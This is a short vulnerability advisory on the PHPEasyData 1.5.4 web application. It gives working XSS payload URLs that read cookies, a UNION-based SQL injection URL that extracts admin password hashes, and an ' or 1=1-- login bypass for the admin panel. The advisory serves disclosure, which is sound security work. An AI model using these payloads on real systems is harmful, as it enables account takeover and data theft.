------------- *PHPEasyData* ------------- Informations : ************** Langage : PHP Version : 1.5.4 Website : http://www.phpeasydata.com/ Problems : Multiple vulnerabilities Description: ************ PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories. Details : ********* --------- ** Xss ** --------- There are multiple xss vulnerabilities. Demonstration exploit URL: -last_records.php: http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.co okie)%3C/script%3E -annuaire.php: http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscr ipt%3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript% 3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie )%3C/script%3E ------------------- ** SQL Injection ** ------------------- -annuaire.php http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,u ser_login,user_fname,user_access%20from%20an_users With this url we can have the admin password(crypted with md5) for example. -admin/login.php Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login: ' or 1=1-- /** Credits: ******** Autor : Sylvain THUAL E-mail : contact (at) click-internet (dot) fr [email concealed] Website : http://www.click-internet.fr